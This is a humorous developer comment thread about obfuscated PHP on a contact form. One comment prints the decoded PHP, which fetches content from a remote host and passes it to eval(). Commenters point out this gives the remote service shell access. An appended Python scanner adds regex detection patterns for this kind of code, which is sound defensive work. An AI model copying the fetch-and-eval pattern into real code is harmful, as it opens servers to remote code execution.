• (cs)

    it's a php implementation of .net's __VIEWSTATE, obviously.

  • Bob (unregistered)

    QmFzZSA2NCBpcyB2ZXJ5IHNlY3VyZS4gQW5kIEZpcnN0Lg==

    (Lol, base 64 is very secure).

  • (cs)

    You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!

  • (cs)

    This is too complex for Paula, isn't it?

  • (cs)

    Y3JleSAtWlpWWlI6Ok9uZnI2NCAtciAnY2V2YWcgcXJwYnFyX29uZnI2NCAoIklUdWNwbE93bzIx Z01KNTBWVHltVlVBeUwzSWxNRjRYIiknCg==

  • (cs)

    Was the coder storing PHP code in a session?

  • (cs)

    I have failed to post first (1st). This is the seventh (7th) post.

  • (cs)

    This code makes baby Jesus cry.

  • (cs) in reply to ChZEROHag
    ChZEROHag:
    Y3JleSAtciAncmlueSB7IGNldmFnICJHdXZmIHBienpyYWcgdmYgZnJwaGVyLlxhIiB9Jwo=

    cFNFV29UOURHenFBRXg1dUdIZ0FxSjlER21xSklIOWZveGIxWlNNREkwdWhJVXlnSXlFT25KOVha S3lpTEhFMG94Z25xVDlYQkprQQpFeDlnR0hjT1pLTzZGVHVZSVFFMkl5SGpMRGNEcVEwOQ==

  • (cs)

    PWNED, er....UFdORUQ=

    <?php
    session_start();
    ///MAILPERMIN///
    if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) {
        $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
        $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']);
        $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
        if (($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20) && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30 * 60)) {
            $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054;
            echo "you have exceeded the number of times you are allowed to use this form

    Please try again in an one (1)hour or three(3)
    ";
            exit;
        } elseif ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 > 30 * 60) {
            session_unset();
            $_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] = 0;
        }
    }
    if (isset($_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044'])) {
        $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
        $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['y711T707A1726193jS5761T757A6731143Z5660Y756A6631044']);
        $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
        if ($z3236T732A4228668u4347Z743A5329757x4650S746A5630054 > 2) {
            $_SESSION['x2226D722A3227678T6670O766A7632034y3135Y731A4128569'] = "";
        }
    }
    ///MAILPERMIN///
    $id_hd = '88BB-5822';
    $id_num = 'fghhijklklmnopqrstvvvwxwyyBDJLNQSUYZaZdefhkkmmnppqsvyABDEFILQUXXYXWTOIxkWJynfWNICzuqlfaVPLGAtlfbVSOLKIIJLPVaflryHSdmxGPbirAJUguFQ';
    ?>
    <?php
    $my_var = '';
    $page_data = <<<PAGE_DATA
    PAGE_DATA;
    $Y6367K763A7331737W8589B785A9533915U9195O791A1013451 = @fopen("http://www.spamfreecontact.com/err/?_=402&ok=$id_num", "r");
    if (!$Y6367K763A7331737W8589B785A9533915U9195O791A1013451) {
        /* echo "<p>Unable to open remote file."; */
        /* exit; */
    } else {
        while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) {
            $Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024);
        }
        eval(' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php ');
        fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451);
    }

    if (($gotten == 111) && ($hd == $id_hd)) {
        include('initrodeGlobal_com.php');
    } elseif ($gotten != 111) {
        include('initrodeGlobal_com.php');
    } elseif (($gotten == 111) && ($hd != $id_hd)) {
        echo $error_msg;
    }
    ?>

  • (cs)

    One of my former jobs did a similar mucking around operation to their PHP, mainly to keep customers from going and messing with it then making support calls.

    I know it was some package that they actually bought a license for. Never paid much attention to see how "secure" it was, as it was really there to be an annoyance.

  • (cs) in reply to topcat_arg
    topcat_arg:
    This is too complex for Paula, isn't it?

    How could that be? Paula is Brillant, isn't she?

  • mongo (unregistered)

    Looks like it was run through an obfuscation tool.

    Captcha: Mongo like modo

  • (cs) in reply to mongo
    mongo:
    Looks like it was run through an obfuscation tool.

    Captcha: Mongo like modo

    Exactly what I was thinking. No one, even those not in their right mind, would create variables like that. Obfuscation would always rename your variables in this fashion; the encryption was also part of that process.

  • bsander (unregistered)

    The real WTF is this:

    echo "you have exceeded the number of times you are allowed to use this form

    Please try again in an one (1)hour or three(3)
    ";

  • (cs)

    This is just so obvious, it even shows how it's encoded in the SAME file!! It would have been a lot better to do the decryption in a separate PHP file, that only includes the encrypted file.

    Or you could just use Zend Encoder, which would work, or write your own Apache-module to 'save money' ;)

    If this is to run on the client's server, then this would probably suffice.

    I once ran into a webpage that was entirely base64-encoded, except for one line of Javascript code. Hey smart-ass, if the user can see the page like it shows up, do you think the client can also use the HTML code? The real joke was that nobody would ever want to copy anything from that code, it looked like crap and so on... The author wanted my opinion on his site. "Well, it doesn't show up in firefox, and I think this line of code is the problem. And by the way, get rid of the encryption, because it only took me 10 minutes to get this code..."

  • SchizoDuckie (unregistered)

    It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

    http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx

    And the site says

    initrodeglobal.com:
    Temporarily Closed for Maintenance

    Come back soon. -- Alex P

    Is it some kind of conspiracy?

  • (cs) in reply to SchizoDuckie
    SchizoDuckie:
    It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

    http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx

    And the site says

    initrodeglobal.com:
    Temporarily Closed for Maintenance

    Come back soon. -- Alex P

    Is it some kind of conspiracy?

    Please file this in a T.P.S. Report. ;)

  • me (unregistered) in reply to SchizoDuckie
    SchizoDuckie:
    It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

    http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx

    And the site says

    initrodeglobal.com:
    Temporarily Closed for Maintenance

    Come back soon. -- Alex P

    Is it some kind of conspiracy?

    Try watching Office Space http://www.imdb.com/title/tt0151804/

  • (cs) in reply to Claxon
    Claxon:
    SchizoDuckie:
    It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

    http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx

    And the site says

    initrodeglobal.com:
    Temporarily Closed for Maintenance

    Come back soon. -- Alex P

    Is it some kind of conspiracy?

    Please file this in a T.P.S. Report. ;)

    my stapler....

    ;)

  • JonF (unregistered)

    Should have used perl & Acme::Pony

  • 名無しさん (unregistered)

    There is an actual commercial package which costs quite a bit and does exactly this. Name escapes me.

  • Jeroen Brattinga (unregistered)

    Sh!t, we've been hacked. All our sensitive R&D data, customer credit and bank records have been stolen. Fortunately one part was uncompromised: the 'Contact Us'-form.

  • SchizoDuckie (unregistered) in reply to me
    me:
    SchizoDuckie:
    It seems that this initrodeglobal.com is a major WTF-source. This is at least the third reference to that company on thedailywtf:

    http://thedailywtf.com/Articles/Leave-That-One-Alone.aspx http://thedailywtf.com/Articles/Some-one-is-trying-to-Hack-the-Site.aspx

    And the site says

    initrodeglobal.com:
    Temporarily Closed for Maintenance

    Come back soon. -- Alex P

    Is it some kind of conspiracy?

    Try watching Office Space http://www.imdb.com/title/tt0151804/

    Thanks for the tip. Utorrent is currently downloading :P

  • Heem (unregistered) in reply to ChZEROHag

    yes, quite secure.

  • john (unregistered)

    It looks like it's been run through an obfuscator.

  • dave (unregistered)

    PD9waHANCiAgJHRoaXNDb21tZW50LT5mZWF0dXJlZCA9IHRydWU7DQo/Pg==

  • (cs)

    Please, everybody, stop saying "encrypted" or "decrypted" -- there's no encryption going on here! Just encoding!

  • Mtr (unregistered)

    base64_decode($string2);

    now what ?

  • (cs) in reply to SchizoDuckie
    SchizoDuckie:
    Thanks for the tip. Utorrent is currently downloading :P
    I see someone's directly headed for the 'pound me in the ass' prison...

    Would it be too much to buy the DVD?

  • zaphod (unregistered)

    $comment = encrypt(":h>Y1~.`4");

  • SchizoDuckie (unregistered) in reply to Leak

    Save the environment! I don't buy plastic useless disks if I can download it too ;-)

    Furthermore, only people from the USA go to pound-me-in-the-ass prisons for downloading movies :')

  • Rob (unregistered)

    spamfreecontact.com? That doesn't sound at all shady!

  • Otto (unregistered)

    This is not all that unusual, actually. It's just been run through an obfuscation tool. Several different ones exist for PHP. You simply run the final code through them, it replaces the variables with gibberish, removes comments and newlines and spaces and such, base 64 encodes, and spits out that result.

    Because PHP is basically a scripting language, and therefore the source = the final result, and a lot of silly people want their code to be "secure from prying eyes", you get this sort of nonsense. Useless and ineffective, but... sigh. Try telling that to any of these morons.

    One use of obfuscation lately that has been pissing me off is when somebody who makes a theme for WordPress (which is all PHP) obfuscates their own linkback into the footer of the thing, and does it in such a way as to make removing it difficult for a non-coder. A coder, of course, simply runs the code, copies the output, and replaces the obfuscated code with it, minus the linkback, but still, it's annoying. I'm trying to convince various theme hosting sites to not allow themes with this crap code in it. Fortunately, it's relatively easy to detect this sort of thing automatically. You just have to look for long strings of letters and numbers without much spacing.

  • Federal Suppliers Guide (unregistered)

    Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!

  • anonymous (unregistered)

    That's standard for code obfuscators -- they change all the variable names, remove all the white space, then base64 encode it.

  • Joel (unregistered)

    At this point, I'm going to have to run most of the comments through a base-64 decode just to see the pointless jokes.

    Of course, that's not going to stop me from doing it.

  • NegativeZero (unregistered)

    I see crap like this all the time (I work in Antivirus development). It's basically just obfuscation. Normally you see it in VBScript and Javascript though.

    Some of the other tricks they like to do are printing out Javascript which will then in turn be run (Javascript allows code to be self-modifying) and breaking things up by randomly URL-encoding characters in strings or even breaking them up and concatenating them, sometimes bringing in the results of random function calls or variables with junk names too.

    This is the first time I've seen someone try and obfuscate PHP like this though.

  • martinsc (unregistered)

    wow... that's all i can say....

  • (cs) in reply to Federal Suppliers Guide
    Federal Suppliers Guide:
    Wait, you hacked our site!? You can't do that! It's SECURE! You can get in a lot of trouble for hacking!

    Nice! That was a great story.

  • kris (unregistered)

    They should base64 encode it twice, that way it will take hackers twice as long!

  • Mnenhy (unregistered)
  • Philip Hofstetter (unregistered)

    the thing I like the most is the blatant security hole:

    while (!feof($Y6367K763A7331737W8589B785A9533915U9195O791A1013451)) {
        $Y5559U755A6530945w2933H729A3928371v48H704A14260396w .= fgets($Y6367K763A7331737W8589B785A9533915U9195O791A1013451, 1024);
    }
    eval(' ?>' . $Y5559U755A6530945w2933H729A3928371v48H704A14260396w . '<?php ');
    fclose($Y6367K763A7331737W8589B785A9533915U9195O791A1013451);

    that file handle points to a remote URL fopen()ed earlier. So this code basically takes some remote content and feeds it into eval().

    How nice of this coder to give their remote service a shell access to his server :-)

    Philip
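
Two of the comments above describe things a reviewer could check for mechanically: Otto's point that obfuscated PHP shows up as long runs of letters and digits with no whitespace, and Philip's point that a file handle opened on a remote URL ends up inside eval(). The following scanner is an added example written for this page; it is not code from the thread, the article, or any project it mentions. It applies three heuristics to PHP source text: a long unbroken run of base64-alphabet characters, eval() wrapped directly around a decoder such as base64_decode(), and a remote URL opened with fopen()/file_get_contents()/curl_init() in a file that also calls eval(). The function names, the thresholds, and the sample input (a constructed snippet modelled on the thread's code, using example.invalid rather than the real host) are all assumptions of this example.

```python
import re
from typing import List, Tuple

# A finding is (rule name, 1-based line number in the scanned source).
Finding = Tuple[str, int]

# Otto's heuristic: 60+ base64-alphabet characters with no whitespace at all.
# Ordinary PHP rarely contains runs that long outside of embedded blobs.
BASE64_RUN = re.compile(r'[A-Za-z0-9+/]{60,}={0,2}')

# eval() applied straight to a decoder output (base64, gzip, rot13).
EVAL_DECODE = re.compile(
    r'\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(',
    re.IGNORECASE,
)

# Philip's heuristic: a remote URL opened in a file that also calls eval().
# This is a file-level approximation; it does not trace which variable reaches eval().
REMOTE_OPEN = re.compile(
    r'\b(?:fopen|file_get_contents|curl_init)\s*\(\s*["\']https?://',
    re.IGNORECASE,
)
EVAL_CALL = re.compile(r'\beval\s*\(', re.IGNORECASE)


def _line_of(source: str, pos: int) -> int:
    """Map a character offset to a 1-based line number."""
    return source.count('\n', 0, pos) + 1


def scan_php(source: str) -> List[Finding]:
    """Return the findings for one PHP source text, sorted by line."""
    findings: List[Finding] = []

    for m in BASE64_RUN.finditer(source):
        findings.append(('long-unbroken-run', _line_of(source, m.start())))

    for m in EVAL_DECODE.finditer(source):
        findings.append(('eval-of-decoded-blob', _line_of(source, m.start())))

    remote_lines = [_line_of(source, m.start()) for m in REMOTE_OPEN.finditer(source)]
    has_eval = EVAL_CALL.search(source) is not None
    if remote_lines and has_eval:
        for line in remote_lines:
            findings.append(('remote-fetch-with-eval', line))

    return sorted(findings, key=lambda f: f[1])


# Constructed sample modelled on the snippet in the thread (hypothetical host).
SAMPLE = r'''<?php
// constructed sample, not the original file
$id_num = 'fghhijklklmnopqrstvvvwxwyyBDJLNQSUYZaZdefhkkmmnppqsvyABDEFILQUXXYXWTOIxkWJynfWNICzuqlfaVPLGAtlfbVSOLKIIJLPVaflryHSdmxGPbirAJUguFQ';
$fh = @fopen("http://example.invalid/err/?ok=$id_num", "r");
$buf = '';
while (!feof($fh)) { $buf .= fgets($fh, 1024); }
eval(' ?>' . $buf . '<?php ');
eval(base64_decode('UFdORUQ='));
?>'''

# Constructed clean file for comparison: no long runs, no eval, no remote fetch.
CLEAN = "<?php\n$x = 1;\necho $x;\n?>"


if __name__ == '__main__':
    for name, src in (('SAMPLE', SAMPLE), ('CLEAN', CLEAN)):
        print(name)
        for rule, line in scan_php(src):
            print(f'  line {line}: {rule}')
```

On the constructed sample this reports the long run on line 3, the remote fetch on line 4 (because the file also calls eval) and the eval-of-decoded-blob on line 8, and nothing for the clean file. The third rule is deliberately coarse: it flags the combination, not a proven data flow, so it is a triage signal for code review rather than a verdict. On the server side, the php.ini setting allow_url_fopen=Off stops fopen() from opening http:// URLs at all, which removes the remote half of the pattern Philip describes.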

  • Sean (unregistered)

    Why is a long variable name considered secure? notepad's find/replace easily defeats it

  • GrandmasterB (unregistered)

    It looks like some newb didn't understand the difference between client and server side execution. He was probably trying to obfuscate the data on the contact form so that spammers couldn't get the email address via web harvesting. I bet he read that in a shiny IT magazine.

    Doing that in javascript does help to some extent. Doing it in PHP is just dumb.

    Some PHP encoders make files that look similar to that base64 block of code, but I don't think that's what that is. They would have calls to decrypt the actual string.

  • wesley0042 (unregistered) in reply to Leak

    Or just watch it for free. It's on hulu.com

  • Edward Royce (unregistered)

    Hmmmmm.

    I am not nearly drunk enough to read this article.

  • Edward Royce (unregistered) in reply to Sean
    Sean:
    Why is a long variable name considered secure? notepad's find/replace easily defeats it

    Now that's a clbuttic!

  • Jay (unregistered) in reply to jvanderb
    jvanderb:
    You never know what some 'hacker' might do if they figure out how to contact you. You might start getting spam or something!

    Or sales.

  • Jay (unregistered)

    I think a fun way to obfuscate code would be to change all the variable names to names that sound like they would be relevant to this program ... but aren't what the field actually contains. Like change "billing_amount" to "payment_amount" and "stock_number" to "quantity_on_hand". Then add a bunch of comments that carefully describe an algorithm that isn't actually a part of this program. Okay, it would be a lot of work, but I'd laugh and laugh thinking about the poor guy who comes after me trying to figure it out. I might try this next time I'm really really mad at the company, just before I quit.

Leave a comment on “Superencryptalisticexpialidocious”
